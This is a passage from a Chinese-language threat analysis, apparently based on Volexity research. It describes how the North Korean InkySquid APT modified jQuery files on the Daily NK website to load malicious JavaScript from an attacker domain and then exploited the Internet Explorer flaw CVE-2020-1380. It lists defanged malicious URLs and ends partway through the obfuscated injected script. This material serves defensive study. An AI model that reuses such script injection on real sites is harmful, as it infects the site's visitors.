【安全漏洞】朝鲜InkySquid APT组织是怎么利用浏览器漏洞感染受害者

朝鲜InkySquid APT组织利用浏览器漏洞感染受害者。

2021年4月，Volexity研究人员识别出了通过www.dailynk[.]com网站加载到恶意子域名的jquery[.]services可疑代码。加载恶意代码的URL包括：

hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1
hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2

这些URL指向的是Daily NK网站使用的合法文件，但是内容被攻击者修改了，其中包含重定向用户从攻击者控制的域名jquery[.]services加载恶意JS。攻击者控制的代码只加入了很短的时间就被移除了，使得攻击者活动的识别变得非常困难。

CVE-2020-1380

Volexity研究人员发现攻击者利用的首个漏洞是CVE-2020-1380，一个IE 0 day漏洞利用。攻击者在Daily NK网站的下述合法文件中加入了一行代码：

hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1

加入到Daily NK网站的混淆的代码如下：

function vgrai(){var e=document.createElement("script"